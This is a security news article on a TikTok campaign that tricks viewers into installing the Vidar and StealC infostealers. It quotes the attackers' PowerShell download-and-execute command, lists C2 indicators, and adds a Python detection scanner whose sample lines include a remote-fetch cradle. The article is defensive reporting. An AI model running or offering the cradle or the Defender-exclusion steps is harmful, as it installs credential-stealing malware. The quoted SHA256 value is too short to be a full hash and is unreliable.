
Hackers Use TikTok Video Trends to Deliver Vidar and Stealc Malware

In a concerning development that underscores the evolving tactics of threat actors, cybercriminals have begun exploiting the popularity of TikTok to distribute sophisticated malware.

This new campaign specifically delivers the Vidar and Stealc infostealers by luring users with the promise of activating legitimate software or unlocking premium features of applications such as Windows, Microsoft Office, CapCut and Spotify.

Unlike conventional malware distribution methods that rely on compromised websites or phishing emails, this attack vector relies entirely on social engineering through video content.


The threat actors create faceless videos, likely generated with AI tools, that give viewers step-by-step instructions so that the victims end up installing the malware on their own systems themselves.

This approach is particularly insidious because no malicious code is hosted on the platform for security solutions to detect: all of the actionable content is delivered visually and audibly within the video itself.

Trend Micro researchers identified several TikTok accounts involved in this campaign, including @Gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc and @digitaldreams771.

Their investigation showed that some videos received significant engagement, with one video gaining over 20,000 likes, 100 comments and about 500,000 views.

This widespread exposure illustrates the potential impact of the campaign and shows how TikTok's algorithmic reach can amplify malicious content.

Widespread exposure and possible impact of the campaign (source – Trend Micro)

The consequences for victims are serious, as these infostealers can exfiltrate sensitive data, steal login credentials and compromise business systems.

Once installed, the malware establishes communication with command-and-control servers, enabling the attackers to harvest valuable information from compromised devices.

This poses a significant threat to both individual users and organizations, since stolen credentials can lead to account takeovers, financial fraud and further network penetration.

Infection mechanism and technical analysis

The infection chain begins when users follow the video's instructions to open PowerShell (by pressing Windows+R and typing "PowerShell") and then run a command similar to:

iex (irm https://allaivo[.]me/spotify)

This innocent-looking command downloads and executes a remote script (SHA256: B8D9821A4777095867AEB2038C464C59ED31A4C7413F768F2E14D3886), which initiates the infection process.

Infection chain (source – Trend Micro)

When executed, the script creates hidden directories in the user's AppData and LocalAppData folders and then adds these locations to the Windows Defender exclusion list, a defense evasion technique that helps the malware avoid detection.

The malware then downloads additional payloads, including the Vidar and StealC infostealers.

These malware variants are particularly dangerous because they target sensitive information, including stored passwords, cryptocurrency wallets and authentication cookies.

Once installed, the malware connects to various command-and-control servers, including abused legitimate services.

Vidar, for example, uses Steam profiles (hxxps://steamcommunity[.]com/profile/7656119846773220) and Telegram channels (hxxps://t[.]me/v00rd) as "dead drop resolvers" to hide its actual C&C infrastructure, a technique that makes tracking and takedown more difficult.
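As an added example (not code from the Trend Micro report or this article), the following Python scanner applies the detection logic a defender would derive from the steps above to constructed PowerShell Script Block Logging lines: the iex/irm download cradle, a Defender exclusion pointed into AppData or LocalAppData, and a hidden directory created there. The Add-MpPreference cmdlet, the sample host name and the sample paths are assumptions, not values from the campaign.

```python
import re

# Constructed sample lines in the shape of PowerShell Script Block Logging
# (Event ID 4104) ScriptBlockText entries; host names and paths are
# placeholders, not indicators from the campaign.
SAMPLE_SCRIPT_BLOCKS = [
    "iex (irm https://updates.example.invalid/spotify)",
    "Invoke-Expression (Invoke-RestMethod 'https://updates.example.invalid/office')",
    'New-Item -ItemType Directory "$env:LOCALAPPDATA\\svc" -Force; attrib +h "$env:LOCALAPPDATA\\svc"',
    'Add-MpPreference -ExclusionPath "$env:APPDATA\\cache"',
    "Get-ChildItem -Path C:\\Users\\alice\\Documents -Recurse",
    "Add-MpPreference -ExclusionPath 'C:\\Program Files\\VendorApp'",
]

# User-profile locations where the loader stages its hidden directories.
USER_PROFILE_DIR = r"(\$env:(LOCAL)?APPDATA|\\Users\\[^\\]+\\AppData)"

RULES = {
    # Download cradle: fetch a remote script and execute it in memory.
    "download_cradle": re.compile(
        r"\b(iex|Invoke-Expression)\s*\(\s*(irm|Invoke-RestMethod|iwr|Invoke-WebRequest)\b",
        re.IGNORECASE,
    ),
    # Defender exclusion pointed at a user-writable profile directory.
    # Add-MpPreference is an assumption; the article only says the script
    # adds the directories to the Defender exclusion list.
    "defender_exclusion_in_profile": re.compile(
        r"Add-MpPreference\b.*-ExclusionPath\b.*" + USER_PROFILE_DIR, re.IGNORECASE
    ),
    # Hidden directory created under AppData or LocalAppData.
    "hidden_dir_in_profile": re.compile(
        r"(attrib\s+\+h|-Attributes\s+Hidden).*" + USER_PROFILE_DIR, re.IGNORECASE
    ),
}

def scan_script_blocks(blocks):
    """Return (rule_name, script_block) for every block that matches a rule."""
    hits = []
    for block in blocks:
        for name, pattern in RULES.items():
            if pattern.search(block):
                hits.append((name, block))
    return hits

if __name__ == "__main__":
    for name, block in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{name}] {block}")
```

Note that an exclusion for a path outside the user profile (the VendorApp line) is deliberately not flagged, since legitimate software installers create such entries; the profile-directory restriction is what keeps the rule's noise down.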

What makes this campaign particularly effective is how it combines social engineering with technical exploitation.

By presenting the videos as helpful tutorials for accessing premium features of popular software, the attackers build trust with viewers, who then willingly run the commands that compromise their systems.

This marks a significant development in social-media-based threats, demonstrating how threat actors continue to adapt their tactics to exploit user behavior and evade traditional security controls.

This campaign demonstrates the continually evolving nature of social engineering attacks and the need for greater security awareness regarding social media content.

Users should maintain healthy skepticism toward unsolicited technical instructions, particularly those involving PowerShell commands, regardless of how legitimate or helpful the source may appear.
